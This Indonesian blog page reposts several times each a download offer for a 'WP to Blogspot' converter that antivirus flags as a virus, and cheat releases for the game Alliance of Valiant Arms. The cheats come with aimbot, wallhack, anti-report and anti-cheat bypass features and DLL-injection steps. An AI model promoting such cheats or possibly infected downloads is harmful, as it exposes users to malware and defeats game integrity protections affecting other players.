Rabu, 30 Oktober 2013

Tool WP to Blogspot Gratis [FREE]

Hallo agan2 Azonmania, maap lama ga update blog (kesibukan mainan auto) :D. Oke tanpa basi-basi, kali ini saya akan membagikan Tool WP to Blogspot Gratis [FREE]. Saya dapet tool ini juga gratis makanya saya bagikan gratis :p. Jelasnya Tool WP to Blogspot ini di share oleh mas Hermawan lewat Facebook.

Tool ini fungsinya hampir mirip sama http://wordpress2blogger.appspot.com/. Kelemahan wordpress2blogger adalah terbatas pada ukuran xml maksimal 1 MB. Agan juga kudu uploud dulu ke webnya. Nah kelebihan dari tool WP to Blogspot ini adalah tidak adanya batasan ukuran xml. Tinggal cari direktori xml di komputer agan lalu konvert aja, tunggu sebentar... JEBREEETTT!!! Netas deh xml cepotnya. Ga perlu uploud2 juga....

Oh ya, mungkin tool ini akan terdeteksi sebagai virus sama antivirus agan.... Jujur aja saya juga ga tau itu virus beneran atau FALS alarm (soalnya saya masih lugu). Tapi saya udah coba di komputer tanpa antivirus, alhamdulillah komputer tetep sehat wal 'afiat.

Silahkan aja kalo mau donlod tool Tool WP to Blogspot Gratis [FREE] -nya gan.. :)

Klik DISINI untuk download.


Hallo agan2 Azonmania, maap lama ga update blog (kesibukan mainan auto) :D. Oke tanpa basi-basi, kali ini saya akan membagikan Tool WP to Blogspot Gratis [FREE]. Saya dapet tool ini juga gratis makanya saya bagikan gratis :p. Jelasnya Tool WP to Blogspot ini di share oleh mas Hermawan lewat Facebook.


Tool ini fungsinya hampir mirip sama http://wordpress2blogger.appspot.com/. Kelemahan wordpress2blogger adalah terbatas pada ukuran xml maksimal 1 MB. Agan juga kudu uploud dulu ke webnya. Nah kelebihan dari tool WP to Blogspot ini adalah tidak adanya batasan ukuran xml. Tinggal cari direktori xml di komputer agan lalu konvert aja, tunggu sebentar... JEBREEETTT!!! Netas deh xml cepotnya. Ga perlu uploud2 juga....

Oh ya, mungkin tool ini akan terdeteksi sebagai virus sama antivirus agan.... Jujur aja saya juga ga tau itu virus beneran atau FALS alarm (soalnya saya masih lugu). Tapi saya udah coba di komputer tanpa antivirus, alhamdulillah komputer tetep sehat wal 'afiat.

Silahkan aja kalo mau donlod tool Tool WP to Blogspot Gratis [FREE] -nya gan.. :)

Klik DISINI untuk download.


Hallo agan2 Azonmania, maap lama ga update blog (kesibukan mainan auto) :D. Oke tanpa basi-basi, kali ini saya akan membagikan Tool WP to Blogspot Gratis [FREE]. Saya dapet tool ini juga gratis makanya saya bagikan gratis :p. Jelasnya Tool WP to Blogspot ini di share oleh mas Hermawan lewat Facebook.


Tool ini fungsinya hampir mirip sama http://wordpress2blogger.appspot.com/. Kelemahan wordpress2blogger adalah terbatas pada ukuran xml maksimal 1 MB. Agan juga kudu uploud dulu ke webnya. Nah kelebihan dari tool WP to Blogspot ini adalah tidak adanya batasan ukuran xml. Tinggal cari direktori xml di komputer agan lalu konvert aja, tunggu sebentar... JEBREEETTT!!! Netas deh xml cepotnya. Ga perlu uploud2 juga....

Oh ya, mungkin tool ini akan terdeteksi sebagai virus sama antivirus agan.... Jujur aja saya juga ga tau itu virus beneran atau FALS alarm (soalnya saya masih lugu). Tapi saya udah coba di komputer tanpa antivirus, alhamdulillah komputer tetep sehat wal 'afiat.

Silahkan aja kalo mau donlod tool Tool WP to Blogspot Gratis [FREE] -nya gan.. :)

Klik DISINI untuk download.


Hallo agan2 Azonmania, maap lama ga update blog (kesibukan mainan auto) :D. Oke tanpa basi-basi, kali ini saya akan membagikan Tool WP to Blogspot Gratis [FREE]. Saya dapet tool ini juga gratis makanya saya bagikan gratis :p. Jelasnya Tool WP to Blogspot ini di share oleh mas Hermawan lewat Facebook.


Tool ini fungsinya hampir mirip sama http://wordpress2blogger.appspot.com/. Kelemahan wordpress2blogger adalah terbatas pada ukuran xml maksimal 1 MB. Agan juga kudu uploud dulu ke webnya. Nah kelebihan dari tool WP to Blogspot ini adalah tidak adanya batasan ukuran xml. Tinggal cari direktori xml di komputer agan lalu konvert aja, tunggu sebentar... JEBREEETTT!!! Netas deh xml cepotnya. Ga perlu uploud2 juga....

Oh ya, mungkin tool ini akan terdeteksi sebagai virus sama antivirus agan.... Jujur aja saya juga ga tau itu virus beneran atau FALS alarm (soalnya saya masih lugu). Tapi saya udah coba di komputer tanpa antivirus, alhamdulillah komputer tetep sehat wal 'afiat.

Silahkan aja kalo mau donlod tool Tool WP to Blogspot Gratis [FREE] -nya gan.. :)

Klik DISINI untuk download.


Hallo agan2 Azonmania, maap lama ga update blog (kesibukan mainan auto) :D. Oke tanpa basi-basi, kali ini saya akan membagikan Tool WP to Blogspot Gratis [FREE]. Saya dapet tool ini juga gratis makanya saya bagikan gratis :p. Jelasnya Tool WP to Blogspot ini di share oleh mas Hermawan lewat Facebook.


Tool ini fungsinya hampir mirip sama http://wordpress2blogger.appspot.com/. Kelemahan wordpress2blogger adalah terbatas pada ukuran xml maksimal 1 MB. Agan juga kudu uploud dulu ke webnya. Nah kelebihan dari tool WP to Blogspot ini adalah tidak adanya batasan ukuran xml. Tinggal cari direktori xml di komputer agan lalu konvert aja, tunggu sebentar... JEBREEETTT!!! Netas deh xml cepotnya. Ga perlu uploud2 juga....

Oh ya, mungkin tool ini akan terdeteksi sebagai virus sama antivirus agan.... Jujur aja saya juga ga tau itu virus beneran atau FALS alarm (soalnya saya masih lugu). Tapi saya udah coba di komputer tanpa antivirus, alhamdulillah komputer tetep sehat wal 'afiat.

Silahkan aja kalo mau donlod tool Tool WP to Blogspot Gratis [FREE] -nya gan.. :)

Klik DISINI untuk download.


Rabu, 09 Oktober 2013

AVA Public Hack





Changelog:

-Optimized Aimbot
-Optimized Triggerbot
-Fixed Slider bugs
-Fixed all known Menu bugs
-Removed One Position Kill
-Removed Kick Random Enemy
-Removed all not working functions
-Added simple Debugger Protection
-Added Remove Impact Effect
-Added Remove Muzzle Flash
-Added Remove Flash Effect
-Added Remove Smoke
-Fixed Instant Fire for less crashes resulted by it
-Added Information Message at Startup
-Optimized ESP for less FPS lags
-Moved Credits to the Settings tab
-Removed Auto Scope because of bugs
-Updated Projectile ESP to display the Projectile type

I'm not responsible if you get banned.

This hack may not work on 32bit systems and Windows 8! If it does then you're lucky, if not then don't post anything about it instead of spamming the thread.


Attention: To be able to use this hack, you need to download and install the Microsoft Redistributable Package: Download Visual C++ Redistributable for Visual Studio 2012 Update 3 from Official Microsoft Download Center.
You also need to download .NET Framework 4.0: http://www.microsoft.com/en-us/downl....aspx?id=17718.
If it's still giving MSVCR110.dll or MSVCP110.dll errors after the Redistributable Package installation, install the other Redistributable Packages: http://www.gabsoftware.com/dl/runtim...able-packages/.


Functions:

Aimbot: Aims for you.

-Auto Aim: Check this to let the Aimbot aim automatically, otherwise press the selected Aim Key to aim.

-Triggerbot: Check this to let the hack fire automatically when you are aiming on an enemy player.

-Limit FOV Angle: Check this to let the Aimbot aim only if the target is standing within the selected FOV Angle.

-Smoothing: Check this to let the Aimbot aim smoothly.



ESP: Makes you able to see things through walls.

-Box ESP: Draws a 2D or 3D box around the target.

-Health ESP: Draws a health bar on the right side of the target.

-Num(eric) Health ESP: Draws the current HP of the target above it's head.

-Name ESP: Draws the target's name over it's head.

-Distance ESP: Draws a value under the target which makes you able to see how far the target is away from you.

-Snap Lines: Draws a 2D line between the bottom middle of your screen and the target.

-Weapon ESP: Draws the target's weapon name under the target

-DogTag ESP: Displays where DogTags are.

-Pickup ESP: Displays where Pickups are.

-Projectile ESP: Displays where Projectiles (Grenades, Rockets, Bubbles...) are.



Underwater: Let's the game look like you are playing underwater.

Add Dog Tags: Gives you tons of dog tags as long as the function is activated.

UAV Enemy (For All): Automatically UAV's the enemy (Also visible for other players in your team).

Spam Bot: Spams the game chat.

Antikick(/Report): Makes other players unable to kick you ingame. When this function gets enabled before joining a game, the players are also unable to report you (You can check this if you can see your name and an empty loading bar on the top right of the screen ingame). When you get kicked ingame while having this function activated, you will automatically switch your team instead of getting kicked (Known bugs: Sometimes you do not get any rewards after a game).

No Spread: Removes the weapon spread.

No Recoil: Removes the weapon recoil.

Crosshair: Draws a crosshair in the middle of your screen.

Superweapons: Every weapon shot fires as many bullets as you set with the Superweapons Bullet Amount Per Shot slider on the Settings tab.

Follow Projectiles: Lets you see the game from the perspective of your Grenades, RPG Rockets....

Rapid Knife: Changes the firing rate of your knife to the firing rate you have set with the Knife Hit Delay slider on the Settings tab.

UAV Enemy: Does the same like UAV Enemy (For All) but other players in your team cannot see it.

Instant Fire: Gives your current weapon an extremely high firing rate (Only for weapons that fire bullets).

No Weapon Bob: Removes the weapon bob.

Remove Impact Effect: Removes the bullet impact effect.

Remove Muzzle Flash: Removes the weapon muzzle flash.

Remove Flash Effect: Removes the grenade flash effect.

Remove Smoke: Removes the grenade smoke effect and all other types of smoke.


Credits:

Credits for the SDK: TheFeckless, HOOAH07, uNrEaL, Tamimego, SystemFiles, R00T88, _silencer, the1domo, K@N@VEL, lowHertz
Credits for the hooking toolkit: Casual_Hacker
Additional Credits: Jeon, zZzeta/S



Instructions:

1.)Run the .exe
2.)Wait for the "Waiting for AVA..." window to appear
3.)Start AVA
4.)If the Hack Loader window closes after starting AVA, the hack is successfully injected.
5.)Use the ingame menu to enable/disable the functions. Toggle the menu with the HOME / Pos1 key.
6.)If the injection keeps failing try to inject with a different injection delay.



Attention:

1.)Start this hack BEFORE starting AVA.
2.)ONLY working for UAVA hosted by AeriaGames.

Please report any bugs you find in this thread!


Virusscans(+ a shitload of false positives):



DOWNLOAD AVA PUBLIC HACK





Changelog:

-Optimized Aimbot
-Optimized Triggerbot
-Fixed Slider bugs
-Fixed all known Menu bugs
-Removed One Position Kill
-Removed Kick Random Enemy
-Removed all not working functions
-Added simple Debugger Protection
-Added Remove Impact Effect
-Added Remove Muzzle Flash
-Added Remove Flash Effect
-Added Remove Smoke
-Fixed Instant Fire for less crashes resulted by it
-Added Information Message at Startup
-Optimized ESP for less FPS lags
-Moved Credits to the Settings tab
-Removed Auto Scope because of bugs
-Updated Projectile ESP to display the Projectile type

I'm not responsible if you get banned.

This hack may not work on 32bit systems and Windows 8! If it does then you're lucky, if not then don't post anything about it instead of spamming the thread.


Attention: To be able to use this hack, you need to download and install the Microsoft Redistributable Package: Download Visual C++ Redistributable for Visual Studio 2012 Update 3 from Official Microsoft Download Center.
You also need to download .NET Framework 4.0: http://www.microsoft.com/en-us/downl....aspx?id=17718.
If it's still giving MSVCR110.dll or MSVCP110.dll errors after the Redistributable Package installation, install the other Redistributable Packages: http://www.gabsoftware.com/dl/runtim...able-packages/.


Functions:

Aimbot: Aims for you.

-Auto Aim: Check this to let the Aimbot aim automatically, otherwise press the selected Aim Key to aim.

-Triggerbot: Check this to let the hack fire automatically when you are aiming on an enemy player.

-Limit FOV Angle: Check this to let the Aimbot aim only if the target is standing within the selected FOV Angle.

-Smoothing: Check this to let the Aimbot aim smoothly.



ESP: Makes you able to see things through walls.

-Box ESP: Draws a 2D or 3D box around the target.

-Health ESP: Draws a health bar on the right side of the target.

-Num(eric) Health ESP: Draws the current HP of the target above it's head.

-Name ESP: Draws the target's name over it's head.

-Distance ESP: Draws a value under the target which makes you able to see how far the target is away from you.

-Snap Lines: Draws a 2D line between the bottom middle of your screen and the target.

-Weapon ESP: Draws the target's weapon name under the target

-DogTag ESP: Displays where DogTags are.

-Pickup ESP: Displays where Pickups are.

-Projectile ESP: Displays where Projectiles (Grenades, Rockets, Bubbles...) are.



Underwater: Let's the game look like you are playing underwater.

Add Dog Tags: Gives you tons of dog tags as long as the function is activated.

UAV Enemy (For All): Automatically UAV's the enemy (Also visible for other players in your team).

Spam Bot: Spams the game chat.

Antikick(/Report): Makes other players unable to kick you ingame. When this function gets enabled before joining a game, the players are also unable to report you (You can check this if you can see your name and an empty loading bar on the top right of the screen ingame). When you get kicked ingame while having this function activated, you will automatically switch your team instead of getting kicked (Known bugs: Sometimes you do not get any rewards after a game).

No Spread: Removes the weapon spread.

No Recoil: Removes the weapon recoil.

Crosshair: Draws a crosshair in the middle of your screen.

Superweapons: Every weapon shot fires as many bullets as you set with the Superweapons Bullet Amount Per Shot slider on the Settings tab.

Follow Projectiles: Lets you see the game from the perspective of your Grenades, RPG Rockets....

Rapid Knife: Changes the firing rate of your knife to the firing rate you have set with the Knife Hit Delay slider on the Settings tab.

UAV Enemy: Does the same like UAV Enemy (For All) but other players in your team cannot see it.

Instant Fire: Gives your current weapon an extremely high firing rate (Only for weapons that fire bullets).

No Weapon Bob: Removes the weapon bob.

Remove Impact Effect: Removes the bullet impact effect.

Remove Muzzle Flash: Removes the weapon muzzle flash.

Remove Flash Effect: Removes the grenade flash effect.

Remove Smoke: Removes the grenade smoke effect and all other types of smoke.


Credits:

Credits for the SDK: TheFeckless, HOOAH07, uNrEaL, Tamimego, SystemFiles, R00T88, _silencer, the1domo, K@N@VEL, lowHertz
Credits for the hooking toolkit: Casual_Hacker
Additional Credits: Jeon, zZzeta/S



Instructions:

1.)Run the .exe
2.)Wait for the "Waiting for AVA..." window to appear
3.)Start AVA
4.)If the Hack Loader window closes after starting AVA, the hack is successfully injected.
5.)Use the ingame menu to enable/disable the functions. Toggle the menu with the HOME / Pos1 key.
6.)If the injection keeps failing try to inject with a different injection delay.



Attention:

1.)Start this hack BEFORE starting AVA.
2.)ONLY working for UAVA hosted by AeriaGames.

Please report any bugs you find in this thread!


Virusscans(+ a shitload of false positives):



DOWNLOAD AVA PUBLIC HACK





Changelog:

-Optimized Aimbot
-Optimized Triggerbot
-Fixed Slider bugs
-Fixed all known Menu bugs
-Removed One Position Kill
-Removed Kick Random Enemy
-Removed all not working functions
-Added simple Debugger Protection
-Added Remove Impact Effect
-Added Remove Muzzle Flash
-Added Remove Flash Effect
-Added Remove Smoke
-Fixed Instant Fire for less crashes resulted by it
-Added Information Message at Startup
-Optimized ESP for less FPS lags
-Moved Credits to the Settings tab
-Removed Auto Scope because of bugs
-Updated Projectile ESP to display the Projectile type

I'm not responsible if you get banned.

This hack may not work on 32bit systems and Windows 8! If it does then you're lucky, if not then don't post anything about it instead of spamming the thread.


Attention: To be able to use this hack, you need to download and install the Microsoft Redistributable Package: Download Visual C++ Redistributable for Visual Studio 2012 Update 3 from Official Microsoft Download Center.
You also need to download .NET Framework 4.0: http://www.microsoft.com/en-us/downl....aspx?id=17718.
If it's still giving MSVCR110.dll or MSVCP110.dll errors after the Redistributable Package installation, install the other Redistributable Packages: http://www.gabsoftware.com/dl/runtim...able-packages/.


Functions:

Aimbot: Aims for you.

-Auto Aim: Check this to let the Aimbot aim automatically, otherwise press the selected Aim Key to aim.

-Triggerbot: Check this to let the hack fire automatically when you are aiming on an enemy player.

-Limit FOV Angle: Check this to let the Aimbot aim only if the target is standing within the selected FOV Angle.

-Smoothing: Check this to let the Aimbot aim smoothly.



ESP: Makes you able to see things through walls.

-Box ESP: Draws a 2D or 3D box around the target.

-Health ESP: Draws a health bar on the right side of the target.

-Num(eric) Health ESP: Draws the current HP of the target above it's head.

-Name ESP: Draws the target's name over it's head.

-Distance ESP: Draws a value under the target which makes you able to see how far the target is away from you.

-Snap Lines: Draws a 2D line between the bottom middle of your screen and the target.

-Weapon ESP: Draws the target's weapon name under the target

-DogTag ESP: Displays where DogTags are.

-Pickup ESP: Displays where Pickups are.

-Projectile ESP: Displays where Projectiles (Grenades, Rockets, Bubbles...) are.



Underwater: Let's the game look like you are playing underwater.

Add Dog Tags: Gives you tons of dog tags as long as the function is activated.

UAV Enemy (For All): Automatically UAV's the enemy (Also visible for other players in your team).

Spam Bot: Spams the game chat.

Antikick(/Report): Makes other players unable to kick you ingame. When this function gets enabled before joining a game, the players are also unable to report you (You can check this if you can see your name and an empty loading bar on the top right of the screen ingame). When you get kicked ingame while having this function activated, you will automatically switch your team instead of getting kicked (Known bugs: Sometimes you do not get any rewards after a game).

No Spread: Removes the weapon spread.

No Recoil: Removes the weapon recoil.

Crosshair: Draws a crosshair in the middle of your screen.

Superweapons: Every weapon shot fires as many bullets as you set with the Superweapons Bullet Amount Per Shot slider on the Settings tab.

Follow Projectiles: Lets you see the game from the perspective of your Grenades, RPG Rockets....

Rapid Knife: Changes the firing rate of your knife to the firing rate you have set with the Knife Hit Delay slider on the Settings tab.

UAV Enemy: Does the same like UAV Enemy (For All) but other players in your team cannot see it.

Instant Fire: Gives your current weapon an extremely high firing rate (Only for weapons that fire bullets).

No Weapon Bob: Removes the weapon bob.

Remove Impact Effect: Removes the bullet impact effect.

Remove Muzzle Flash: Removes the weapon muzzle flash.

Remove Flash Effect: Removes the grenade flash effect.

Remove Smoke: Removes the grenade smoke effect and all other types of smoke.


Credits:

Credits for the SDK: TheFeckless, HOOAH07, uNrEaL, Tamimego, SystemFiles, R00T88, _silencer, the1domo, K@N@VEL, lowHertz
Credits for the hooking toolkit: Casual_Hacker
Additional Credits: Jeon, zZzeta/S



Instructions:

1.)Run the .exe
2.)Wait for the "Waiting for AVA..." window to appear
3.)Start AVA
4.)If the Hack Loader window closes after starting AVA, the hack is successfully injected.
5.)Use the ingame menu to enable/disable the functions. Toggle the menu with the HOME / Pos1 key.
6.)If the injection keeps failing try to inject with a different injection delay.



Attention:

1.)Start this hack BEFORE starting AVA.
2.)ONLY working for UAVA hosted by AeriaGames.

Please report any bugs you find in this thread!


Virusscans(+ a shitload of false positives):



DOWNLOAD AVA PUBLIC HACK





Changelog:

-Optimized Aimbot
-Optimized Triggerbot
-Fixed Slider bugs
-Fixed all known Menu bugs
-Removed One Position Kill
-Removed Kick Random Enemy
-Removed all not working functions
-Added simple Debugger Protection
-Added Remove Impact Effect
-Added Remove Muzzle Flash
-Added Remove Flash Effect
-Added Remove Smoke
-Fixed Instant Fire for less crashes resulted by it
-Added Information Message at Startup
-Optimized ESP for less FPS lags
-Moved Credits to the Settings tab
-Removed Auto Scope because of bugs
-Updated Projectile ESP to display the Projectile type

I'm not responsible if you get banned.

This hack may not work on 32bit systems and Windows 8! If it does then you're lucky, if not then don't post anything about it instead of spamming the thread.


Attention: To be able to use this hack, you need to download and install the Microsoft Redistributable Package: Download Visual C++ Redistributable for Visual Studio 2012 Update 3 from Official Microsoft Download Center.
You also need to download .NET Framework 4.0: http://www.microsoft.com/en-us/downl....aspx?id=17718.
If it's still giving MSVCR110.dll or MSVCP110.dll errors after the Redistributable Package installation, install the other Redistributable Packages: http://www.gabsoftware.com/dl/runtim...able-packages/.


Functions:

Aimbot: Aims for you.

-Auto Aim: Check this to let the Aimbot aim automatically, otherwise press the selected Aim Key to aim.

-Triggerbot: Check this to let the hack fire automatically when you are aiming on an enemy player.

-Limit FOV Angle: Check this to let the Aimbot aim only if the target is standing within the selected FOV Angle.

-Smoothing: Check this to let the Aimbot aim smoothly.



ESP: Makes you able to see things through walls.

-Box ESP: Draws a 2D or 3D box around the target.

-Health ESP: Draws a health bar on the right side of the target.

-Num(eric) Health ESP: Draws the current HP of the target above it's head.

-Name ESP: Draws the target's name over it's head.

-Distance ESP: Draws a value under the target which makes you able to see how far the target is away from you.

-Snap Lines: Draws a 2D line between the bottom middle of your screen and the target.

-Weapon ESP: Draws the target's weapon name under the target

-DogTag ESP: Displays where DogTags are.

-Pickup ESP: Displays where Pickups are.

-Projectile ESP: Displays where Projectiles (Grenades, Rockets, Bubbles...) are.



Underwater: Let's the game look like you are playing underwater.

Add Dog Tags: Gives you tons of dog tags as long as the function is activated.

UAV Enemy (For All): Automatically UAV's the enemy (Also visible for other players in your team).

Spam Bot: Spams the game chat.

Antikick(/Report): Makes other players unable to kick you ingame. When this function gets enabled before joining a game, the players are also unable to report you (You can check this if you can see your name and an empty loading bar on the top right of the screen ingame). When you get kicked ingame while having this function activated, you will automatically switch your team instead of getting kicked (Known bugs: Sometimes you do not get any rewards after a game).

No Spread: Removes the weapon spread.

No Recoil: Removes the weapon recoil.

Crosshair: Draws a crosshair in the middle of your screen.

Superweapons: Every weapon shot fires as many bullets as you set with the Superweapons Bullet Amount Per Shot slider on the Settings tab.

Follow Projectiles: Lets you see the game from the perspective of your Grenades, RPG Rockets....

Rapid Knife: Changes the firing rate of your knife to the firing rate you have set with the Knife Hit Delay slider on the Settings tab.

UAV Enemy: Does the same like UAV Enemy (For All) but other players in your team cannot see it.

Instant Fire: Gives your current weapon an extremely high firing rate (Only for weapons that fire bullets).

No Weapon Bob: Removes the weapon bob.

Remove Impact Effect: Removes the bullet impact effect.

Remove Muzzle Flash: Removes the weapon muzzle flash.

Remove Flash Effect: Removes the grenade flash effect.

Remove Smoke: Removes the grenade smoke effect and all other types of smoke.


Credits:

Credits for the SDK: TheFeckless, HOOAH07, uNrEaL, Tamimego, SystemFiles, R00T88, _silencer, the1domo, K@N@VEL, lowHertz
Credits for the hooking toolkit: Casual_Hacker
Additional Credits: Jeon, zZzeta/S



Instructions:

1.)Run the .exe
2.)Wait for the "Waiting for AVA..." window to appear
3.)Start AVA
4.)If the Hack Loader window closes after starting AVA, the hack is successfully injected.
5.)Use the ingame menu to enable/disable the functions. Toggle the menu with the HOME / Pos1 key.
6.)If the injection keeps failing try to inject with a different injection delay.



Attention:

1.)Start this hack BEFORE starting AVA.
2.)ONLY working for UAVA hosted by AeriaGames.

Please report any bugs you find in this thread!


Virusscans(+ a shitload of false positives):



DOWNLOAD AVA PUBLIC HACK





Changelog:

-Optimized Aimbot
-Optimized Triggerbot
-Fixed Slider bugs
-Fixed all known Menu bugs
-Removed One Position Kill
-Removed Kick Random Enemy
-Removed all not working functions
-Added simple Debugger Protection
-Added Remove Impact Effect
-Added Remove Muzzle Flash
-Added Remove Flash Effect
-Added Remove Smoke
-Fixed Instant Fire for less crashes resulted by it
-Added Information Message at Startup
-Optimized ESP for less FPS lags
-Moved Credits to the Settings tab
-Removed Auto Scope because of bugs
-Updated Projectile ESP to display the Projectile type

I'm not responsible if you get banned.

This hack may not work on 32bit systems and Windows 8! If it does then you're lucky, if not then don't post anything about it instead of spamming the thread.


Attention: To be able to use this hack, you need to download and install the Microsoft Redistributable Package: Download Visual C++ Redistributable for Visual Studio 2012 Update 3 from Official Microsoft Download Center.
You also need to download .NET Framework 4.0: http://www.microsoft.com/en-us/downl....aspx?id=17718.
If it's still giving MSVCR110.dll or MSVCP110.dll errors after the Redistributable Package installation, install the other Redistributable Packages: http://www.gabsoftware.com/dl/runtim...able-packages/.


Functions:

Aimbot: Aims for you.

-Auto Aim: Check this to let the Aimbot aim automatically, otherwise press the selected Aim Key to aim.

-Triggerbot: Check this to let the hack fire automatically when you are aiming on an enemy player.

-Limit FOV Angle: Check this to let the Aimbot aim only if the target is standing within the selected FOV Angle.

-Smoothing: Check this to let the Aimbot aim smoothly.



ESP: Makes you able to see things through walls.

-Box ESP: Draws a 2D or 3D box around the target.

-Health ESP: Draws a health bar on the right side of the target.

-Num(eric) Health ESP: Draws the current HP of the target above it's head.

-Name ESP: Draws the target's name over it's head.

-Distance ESP: Draws a value under the target which makes you able to see how far the target is away from you.

-Snap Lines: Draws a 2D line between the bottom middle of your screen and the target.

-Weapon ESP: Draws the target's weapon name under the target

-DogTag ESP: Displays where DogTags are.

-Pickup ESP: Displays where Pickups are.

-Projectile ESP: Displays where Projectiles (Grenades, Rockets, Bubbles...) are.



Underwater: Let's the game look like you are playing underwater.

Add Dog Tags: Gives you tons of dog tags as long as the function is activated.

UAV Enemy (For All): Automatically UAV's the enemy (Also visible for other players in your team).

Spam Bot: Spams the game chat.

Antikick(/Report): Makes other players unable to kick you ingame. When this function gets enabled before joining a game, the players are also unable to report you (You can check this if you can see your name and an empty loading bar on the top right of the screen ingame). When you get kicked ingame while having this function activated, you will automatically switch your team instead of getting kicked (Known bugs: Sometimes you do not get any rewards after a game).

No Spread: Removes the weapon spread.

No Recoil: Removes the weapon recoil.

Crosshair: Draws a crosshair in the middle of your screen.

Superweapons: Every weapon shot fires as many bullets as you set with the Superweapons Bullet Amount Per Shot slider on the Settings tab.

Follow Projectiles: Lets you see the game from the perspective of your Grenades, RPG Rockets....

Rapid Knife: Changes the firing rate of your knife to the firing rate you have set with the Knife Hit Delay slider on the Settings tab.

UAV Enemy: Does the same like UAV Enemy (For All) but other players in your team cannot see it.

Instant Fire: Gives your current weapon an extremely high firing rate (Only for weapons that fire bullets).

No Weapon Bob: Removes the weapon bob.

Remove Impact Effect: Removes the bullet impact effect.

Remove Muzzle Flash: Removes the weapon muzzle flash.

Remove Flash Effect: Removes the grenade flash effect.

Remove Smoke: Removes the grenade smoke effect and all other types of smoke.


Credits:

Credits for the SDK: TheFeckless, HOOAH07, uNrEaL, Tamimego, SystemFiles, R00T88, _silencer, the1domo, K@N@VEL, lowHertz
Credits for the hooking toolkit: Casual_Hacker
Additional Credits: Jeon, zZzeta/S



Instructions:

1.)Run the .exe
2.)Wait for the "Waiting for AVA..." window to appear
3.)Start AVA
4.)If the Hack Loader window closes after starting AVA, the hack is successfully injected.
5.)Use the ingame menu to enable/disable the functions. Toggle the menu with the HOME / Pos1 key.
6.)If the injection keeps failing try to inject with a different injection delay.



Attention:

1.)Start this hack BEFORE starting AVA.
2.)ONLY working for UAVA hosted by AeriaGames.

Please report any bugs you find in this thread!


Virusscans(+ a shitload of false positives):



DOWNLOAD AVA PUBLIC HACK

Jumat, 13 September 2013

Alliance of Valiant arms Japan Hack!!! BEST VERSION


Features:

  • Visuals (Box, Name, Health, HealthBar)
  • Smooth Aimbot (Head, Neck, Chest) LEFT ALT KEY TO AIM****
  • Spawn Red Para
  • Bypass included (Cheat Engine, Old Chams, etc.)
  • Removes RECOIL + SPREAD PERM


Toggles:
  • END key for toggle worst menu NAJP


Procedure:
  • Extract JAVA.dll from the RAR and AUTOinject it with any normal injector


Credits:
  • Jabberwo0ck cuz she is my princess that motivates me
  • ccman32 cuz I feel like it
  • Fr3ddy11 cuz he mad he can't play JAVA like the rest of us
  • akinator for making the worst menu NAJP for us



Virus Scans:
JAVA.rar - Jottis Malwarescanner
https://www.virustotal.com/de/file/e...is/1377643482/







Sumber : mpght.net


Features:

  • Visuals (Box, Name, Health, HealthBar)
  • Smooth Aimbot (Head, Neck, Chest) LEFT ALT KEY TO AIM****
  • Spawn Red Para
  • Bypass included (Cheat Engine, Old Chams, etc.)
  • Removes RECOIL + SPREAD PERM


Toggles:
  • END key for toggle worst menu NAJP


Procedure:
  • Extract JAVA.dll from the RAR and AUTOinject it with any normal injector


Credits:
  • Jabberwo0ck cuz she is my princess that motivates me
  • ccman32 cuz I feel like it
  • Fr3ddy11 cuz he mad he can't play JAVA like the rest of us
  • akinator for making the worst menu NAJP for us



Virus Scans:
JAVA.rar - Jottis Malwarescanner
https://www.virustotal.com/de/file/e...is/1377643482/







Sumber : mpght.net


Features:

  • Visuals (Box, Name, Health, HealthBar)
  • Smooth Aimbot (Head, Neck, Chest) LEFT ALT KEY TO AIM****
  • Spawn Red Para
  • Bypass included (Cheat Engine, Old Chams, etc.)
  • Removes RECOIL + SPREAD PERM


Toggles:
  • END key for toggle worst menu NAJP


Procedure:
  • Extract JAVA.dll from the RAR and AUTOinject it with any normal injector


Credits:
  • Jabberwo0ck cuz she is my princess that motivates me
  • ccman32 cuz I feel like it
  • Fr3ddy11 cuz he mad he can't play JAVA like the rest of us
  • akinator for making the worst menu NAJP for us



Virus Scans:
JAVA.rar - Jottis Malwarescanner
https://www.virustotal.com/de/file/e...is/1377643482/







Sumber : mpght.net


Features:

  • Visuals (Box, Name, Health, HealthBar)
  • Smooth Aimbot (Head, Neck, Chest) LEFT ALT KEY TO AIM****
  • Spawn Red Para
  • Bypass included (Cheat Engine, Old Chams, etc.)
  • Removes RECOIL + SPREAD PERM


Toggles:
  • END key for toggle worst menu NAJP


Procedure:
  • Extract JAVA.dll from the RAR and AUTOinject it with any normal injector


Credits:
  • Jabberwo0ck cuz she is my princess that motivates me
  • ccman32 cuz I feel like it
  • Fr3ddy11 cuz he mad he can't play JAVA like the rest of us
  • akinator for making the worst menu NAJP for us



Virus Scans:
JAVA.rar - Jottis Malwarescanner
https://www.virustotal.com/de/file/e...is/1377643482/







Sumber : mpght.net


Features:

  • Visuals (Box, Name, Health, HealthBar)
  • Smooth Aimbot (Head, Neck, Chest) LEFT ALT KEY TO AIM****
  • Spawn Red Para
  • Bypass included (Cheat Engine, Old Chams, etc.)
  • Removes RECOIL + SPREAD PERM


Toggles:
  • END key for toggle worst menu NAJP


Procedure:
  • Extract JAVA.dll from the RAR and AUTOinject it with any normal injector


Credits:
  • Jabberwo0ck cuz she is my princess that motivates me
  • ccman32 cuz I feel like it
  • Fr3ddy11 cuz he mad he can't play JAVA like the rest of us
  • akinator for making the worst menu NAJP for us



Virus Scans:
JAVA.rar - Jottis Malwarescanner
https://www.virustotal.com/de/file/e...is/1377643482/







Sumber : mpght.net

CARA MENGHINDARI SURVEY SAAT MENDOWNLOAD

Bagaimana cara mendownload file yang pada halaman tersebut terdapat survey atau tampilan yang menutupi link download yang ada ?
Poling survey sebenarnya digunakan untuk mengetahui tanggapan dari pengunjung terhadap polling yang ditanyakan. Namun, polling seperti ini dirasa mengganggu ! Saya contohkan survey yang dimaksud :

Halaman yang meminta polling survey
Pada gambar di atas, sebelum bisa mendownload mau tidak mau kita harus mengikuti instruksi yang diminta oleh survey. Itulah mengapa saya katakan tampilan seperti ini mengganggu !
Pada postingan kali ini, saya akan share bagaimana cara mengatasi halaman download yang ada polling survey nya. Silahkan disimak :
Untuk Google Chrome :
  • Klik Customize and control Google Chrome (Gambar Kunci Pas di pojok kanan atas)
  • Klik Option
  • Pilih Under The Hood
  • Pada Privacy , pilih Content Settings..
  • Pada JavaScript , Ceklist Do Not Allow Any Site to Run JavaScript
  • atau untuk memanage beberapa site saja , silahkan gunakan Manage Exceptions
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

Untuk Mozilla Firefox :
